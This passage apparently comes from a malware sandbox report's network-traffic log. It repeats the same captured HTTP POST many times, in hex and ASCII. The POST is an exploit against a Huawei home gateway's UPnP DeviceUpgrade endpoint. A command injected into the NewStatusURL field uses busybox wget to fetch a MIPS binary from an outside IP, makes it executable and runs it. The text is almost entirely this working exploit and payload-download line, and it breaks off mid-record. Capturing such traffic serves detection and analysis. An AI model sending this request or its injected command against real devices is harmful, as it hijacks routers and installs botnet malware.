6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 